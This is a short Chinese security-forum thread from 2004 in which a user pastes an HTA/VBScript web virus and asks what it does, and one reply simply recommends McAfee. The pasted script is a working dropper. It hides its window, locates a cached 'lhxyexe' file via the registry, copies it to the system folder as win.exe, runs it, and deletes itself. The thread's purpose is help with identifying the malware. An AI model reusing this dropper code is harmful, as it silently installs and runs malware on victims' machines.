|
 | 作者: zeng7071 [zeng7071]
 论坛用户 |
登录 |
| HTA:APPLICATION caption="no" border="none" showintaskbar="no" > <object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object> <script LANGUAGE="VBScript"> on error resume next window.moveTo 0,0 window.resizeTo 0,0 dim exepath Function Search(objFolder) Dim objSubFolder For Each objFile in objFolder.Files If InStr(1, objfile.name, "lhxyexe", vbtextcompare) then set filecp = objg_fso.getfile(objfile.path) filecp.copy (exepath) exit for End If Next For Each objSubFolder in objFolder.SubFolders Search objSubFolder Next End Function Set objg_fso = CreateObject("Scripting.FileSystemObject") str=WSH.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache") set tempfolder = objg_fso.getfolder(str) set othisfolder = objg_fso.GetSpecialFolder(1) exepath=othisfolder.path & "win.exe" search tempfolder wsh.run (exepath) wsh.run "command.com /c del c:\win.hta" ,0 window.close() </script> 不知道为什么只要我同学一来我的机子上,就中这种网页病毒,晕呀,这个用vb编的吧,帮帮忙看看作用是什么 |
| 地主 发表时间: 04-05-20 13:55 |
| 回复: lhx038 [lhx038] 论坛用户 |
登录 |
|
用MCAFEE |
| B1层 发表时间: 04-05-20 15:07 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: 帮帮忙